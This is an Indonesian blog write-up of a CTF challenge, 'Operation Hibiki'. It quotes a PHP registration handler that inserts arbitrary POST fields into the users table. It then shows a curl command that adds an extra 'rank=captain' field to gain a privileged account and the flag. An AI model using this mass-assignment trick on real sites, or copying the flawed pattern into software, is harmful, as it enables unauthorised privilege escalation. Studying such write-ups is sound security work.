Saturday, December 8, 2018

[AsgamaCTF] Operation Hibiki

disoal ini diberikan sebuah web login dan register, selain itu juga diberikan source code dari web tersebut, untuk mendapatkan flag dari soal ini saya tidak bisa menggunakan SQL INJECTION namun saya mengecek pada source code web ada sebuah celah untuk mendapatkan flag.

terdapat celah pada
foreach($_POST as $key => $value){
            $columns .= filter($key) . ",";
            $values .= "'" . filter($value) . "',";
        }
        $columns = substr($columns, 0, -1);
        $values = substr($values, 0, -1);
$stmt = $conn->prepare("insert into users ($columns) values ($values)");
jadi saya harus mengirim data post dengan menggunakan CURL, caranya dengan buka terminal lalu membuat perintah seperti ini:
curl -d "username=bukanhakel&password=pinginjadihakel&rank=captain" -X POST "http://gamactf.asgama.web.id:41002/register_proc.php"
setelah berhasil mendaftar silahkan login pakai username dan password sudah didaftarkan, maka flag akan muncul
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)